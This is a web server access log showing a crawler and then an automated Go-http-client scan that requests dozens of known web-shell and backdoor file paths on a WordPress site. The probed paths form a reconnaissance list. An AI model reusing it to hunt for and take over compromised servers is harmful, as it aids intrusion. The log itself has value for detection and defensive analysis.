216.244.66.202 - - [31/Mar/2025:09:43:47 -0400] "GET /page/8/ HTTP/1.1" 200 97489 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [31/Mar/2025:09:48:15 -0400] "GET /unveiling-the-thrill-exploring-the-world-of-dewapoker/feed/ HTTP/1.1" 200 97489 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
149.88.101.23 - - [31/Mar/2025:09:51:42 -0400] "GET /wp-content/plugins/include.php HTTP/1.1" 200 97548 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:43 -0400] "GET /wp-2019.php HTTP/1.1" 200 97530 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:44 -0400] "GET /admin.php HTTP/1.1" 200 97489 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:44 -0400] "GET /about.php HTTP/1.1" 200 97489 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:44 -0400] "GET /users.php HTTP/1.1" 200 97489 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:45 -0400] "GET /wp-includes/pomo/about.php HTTP/1.1" 200 97612 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:45 -0400] "GET /install.php HTTP/1.1" 200 97489 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:45 -0400] "GET /wp-includes/certificates/wp.php HTTP/1.1" 200 97489 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:45 -0400] "GET /wp-content/plugins/wp-catcher/admin.php HTTP/1.1" 200 97489 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:46 -0400] "GET /wp-content/plugins/wp-catcher/cong.php HTTP/1.1" 200 97489 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:46 -0400] "GET /images/wp-login.php HTTP/1.1" 200 97634 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:46 -0400] "GET /wp-content/uploads/duck.php HTTP/1.1" 200 97634 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:47 -0400] "GET /wp-content/plugins/seoo/alfanew.php HTTP/1.1" 200 97663 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:47 -0400] "GET /wp-content/themes/pridmag/byp.php HTTP/1.1" 200 97489 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:47 -0400] "GET /cux.php HTTP/1.1" 200 97645 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:47 -0400] "GET /.tmb/file.php HTTP/1.1" 200 97489 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:48 -0400] "GET /wp-admin.php HTTP/1.1" 200 97524 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:48 -0400] "GET /wp-includes/Requests/network.php HTTP/1.1" 200 97612 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:48 -0400] "GET /.well-known/pki-validation/content.php HTTP/1.1" 404 1251 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:48 -0400] "GET /wp-content/themes.php HTTP/1.1" 200 97489 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:49 -0400] "GET /wp-content/wp-cron.php HTTP/1.1" 200 97663 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:49 -0400] "GET /wp-admin/maint/index.php HTTP/1.1" 200 97612 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:49 -0400] "GET /.well-known/pki-validation/about_php1.php HTTP/1.1" 404 1251 "-" "Go-http-client/1.1"
149.88.101.23 - - [31/Mar/2025:09:51:50 -0400] "GET /gif.php HTTP/1.1" 200 97634 "-" "Go-http-client/1.1"
